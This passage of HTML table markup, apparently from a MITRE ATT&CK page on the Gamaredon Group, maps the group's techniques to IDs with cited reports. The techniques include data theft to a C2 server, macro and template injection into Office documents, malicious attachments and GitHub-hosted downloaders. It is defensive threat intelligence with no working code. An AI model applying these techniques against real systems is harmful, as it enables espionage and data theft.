transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Information Discovery</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">A </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1016"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1016</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1016/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1016"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Network Configuration Discovery</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1016/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Internet Connection Discovery</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has tested connectivity between a compromised machine and a C2 server using </span><a href="https://attack.mitre.org/software/S0097"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Ping</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> with commands such as </span><span style="font-size: 10.5pt; font-family: &quot; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">CSIDL_SYSTEM\cmd.exe /c ping -n 1</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.</span><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1033"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1033</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1033"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Owner/User Discovery</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">A </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> file stealer can gather the victim's username to send to a C2 server.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1080"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1080</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1080"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Taint Shared Content</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has injected malicious macros into all Word and Excel documents on mapped network drives.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:56.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1221"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1221</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1221"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Template Injection</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used DOCX files to download malicious DOT document templates and has used RTF template injection to download malicious payloads.</span><a href="https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[10]</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> can also inject malicious macros or remote templates into documents already present on compromised systems.</span><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a><a href="https://www.secureworks.com/research/threat-profiles/iron-tilden"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[7]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1204"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1204</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1204/002"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.002</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1204"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">User Execution</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1204/002"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Malicious File</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has attempted to get users to click on Office attachments with malicious macros embedded.</span><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a><a href="https://www.secureworks.com/research/threat-profiles/iron-tilden"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[7]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1102"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1102</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1102"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Web Service</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1047</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Windows Management Instrumentation</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used WMI to execute scripts used for discovery.</span><a 